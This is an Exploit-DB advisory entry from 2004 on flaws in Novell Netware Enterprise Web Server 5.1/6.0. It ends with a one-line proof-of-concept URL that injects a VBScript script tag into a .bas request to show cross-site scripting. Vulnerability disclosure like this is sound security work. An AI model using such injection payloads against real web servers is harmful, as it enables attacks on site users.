Novell Netware Enterprise Web Server 5.1/6.0 - env.bas Information Disclosure

EDB-ID:

23586




Platform:

Netware

Date:

2004-01-23


source: https://www.securityfocus.com/bid/9479/info

Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. 

http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas